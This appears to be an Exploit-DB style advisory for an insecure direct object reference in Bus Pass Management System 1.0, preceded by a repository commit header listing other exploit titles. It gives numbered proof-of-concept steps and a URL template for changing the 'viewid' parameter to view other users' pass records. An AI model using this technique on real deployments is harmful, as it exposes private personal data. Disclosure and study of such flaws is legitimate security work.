8f90c99e8c
8 changes to exploits/shellcodes SmartFTP Client 10.0.2909.0 - 'Multiple' Denial of Service Argus Surveillance DVR 4.0 - Unquoted Service Path OpenEMR 6.0.0 - 'noteid' Insecure Direct Object Reference (IDOR) FlatCore CMS 2.0.7 - Remote Code Execution (RCE) (Authenticated) Bus Pass Management System 1.0 - 'viewid' Insecure direct object references (IDOR) Patient Appointment Scheduler System 1.0 - Unauthenticated File Upload & Remote Code Execution (RCE) Patient Appointment Scheduler System 1.0 - Persistent/Stored XSS Antminer Monitor 0.5.0 - Authentication Bypass
25 lines
No EOL
919 B
Text
25 lines
No EOL
919 B
Text
# Exploit Title: Bus Pass Management System 1.0 - 'viewid' Insecure direct object references (IDOR)
|
|
# Date: 2021-09-05
|
|
# Exploit Author: sudoninja
|
|
# Vendor Homepage: https://phpgurukul.com/bus-pass-management-system-using-php-and-mysql
|
|
# Software Link: https://phpgurukul.com/wp-content/uploads/2021/07/Bus-Pass-Management-System-Using-PHP-MySQL.zip
|
|
# Version: 1.0
|
|
# Tested on: Windows 10 - XAMPP Server
|
|
|
|
# Vulnerable page :
|
|
|
|
http://localhost/buspassms/admin/view-pass-detail.php?viewid=4
|
|
|
|
# Vulnerable paramater :
|
|
|
|
The viewid paramater is Vulnerable to Insecure direct object references (IDOR)
|
|
|
|
# Proof Of Concept :
|
|
|
|
# 1 . Download And install [ bus-pass-management-system ]
|
|
# 2 . Go to /admin/index.php and Enter Username & Password
|
|
# 3 . Navigate to search >> search pass
|
|
# 4 . Click on the view and enter the change viewid into the Url
|
|
|
|
Use :
|
|
http://localhost/buspassms/admin/view-pass-detail.php?viewid=[change id] |